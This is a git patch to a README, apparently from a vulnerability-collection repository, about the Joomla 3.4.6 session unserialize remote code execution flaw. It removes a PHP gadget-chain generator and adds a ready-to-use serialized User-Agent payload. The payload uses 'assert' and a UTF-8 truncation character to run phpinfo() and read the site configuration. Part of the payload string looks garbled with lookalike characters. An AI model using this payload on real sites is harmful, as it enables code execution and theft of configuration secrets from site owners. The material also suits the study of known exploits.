From 73fc2535ce2f2798b1b82a9e6ca1db645c4d64d0 Mon Sep 17 00:00:00 2001 From: Mr5m1th <32160540+Mr5m1th@users.noreply.github.com> Date: Sat, 25 Nov 2017 16:12:53 +0800 Subject: [PATCH] Update README.md --- CMS/Joomla/Joomla_v3.4.6/README.md | 47 ++---------------------------- 1 file changed, 3 insertions(+), 44 deletions(-) diff --git a/CMS/Joomla/Joomla_v3.4.6/README.md b/CMS/Joomla/Joomla_v3.4.6/README.md index 3f32ae4..88dc569 100644 --- a/CMS/Joomla/Joomla_v3.4.6/README.md +++ b/CMS/Joomla/Joomla_v3.4.6/README.md @@ -5,48 +5,7 @@ * [https://www.leavesongs.com/PENETRATION/joomla-unserialize-code-execute-vulnerability.html](https://www.leavesongs.com/PENETRATION/joomla-unserialize-code-execute-vulnerability.html) * PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患[https://github.com/80vul/phpcodz/blob/master/research/pch-013.md](https://github.com/80vul/phpcodz/blob/master/research/pch-013.md) * `利用'𝌆'(%F0%9D%8C%86)字符将utf-8的字段截断.` -## EXP -```php -feed_url = "phpinfo();JFactory::getConfig();exit;"; - $this->javascript = 9999; - $this->cache_name_function = "assert"; - $this->sanitize = new JDatabaseDriverMysql(); - $this->cache = true; - } -} - -class JDatabaseDriverMysqli { - protected $a; - protected $disconnectHandlers; - protected $connection; - function __construct() - { - $this->a = new JSimplepieFactory(); - $x = new SimplePie(); - $this->connection = 1; - $this->disconnectHandlers = [ - [$x, "init"], - ]; - } -} - -$a = new JDatabaseDriverMysqli(); -echo serialize($a); -``` ## POC -由上述代码生成 +``` +User-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"ρhιτhσπpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}𝌆 +```